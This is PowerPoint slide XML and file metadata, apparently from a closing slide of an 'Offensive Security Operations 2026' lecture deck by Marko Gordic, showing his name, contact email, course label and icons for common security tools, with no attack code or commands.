      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="3931920"/>
            <a:ext cx="3108960" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="4160520"/>
            <a:ext cx="7315200" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Marko Gordic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>marko@thecyberprotect.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Offensive Security Operations 2026  //  PMF Kragujevac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 0" descr="img/ic_kalilinux.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="45000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8595360" y="2788920"/>
            <a:ext cx="566928" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 1" descr="img/ic_metasploit.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="45000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509760" y="2788920"/>
            <a:ext cx="566928" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 2" descr="img/ic_wireshark.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="45000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10424160" y="2788920"/>
            <a:ext cx="566928" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 3" descr="img/ic_gnubash.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="45000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11338560" y="2788920"/>
            <a:ext cx="566928" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 4" descr="img/nmap_eye.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="22000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8503920" y="3703320"/>
            <a:ext cx="3108960" cy="1810512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11292840" y="6327648"/>
            <a:ext cx="457200" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="342A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>60</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60</Slides>
  <Notes>60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60</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="6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vector>
  </TitlesOfParts>
  <Company>The Cyber Protect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Network Security</dc:title>
  <dc:subject>Offensive Security Operations 2026</dc:subject>
  <dc:creator>Marko Gordic</dc:creator>
  <cp:lastModifiedBy>Marko Gordic</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-28T13:45:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-28T13:45:34Z</dcterms:modified>
</cp:coreProperties>
</file>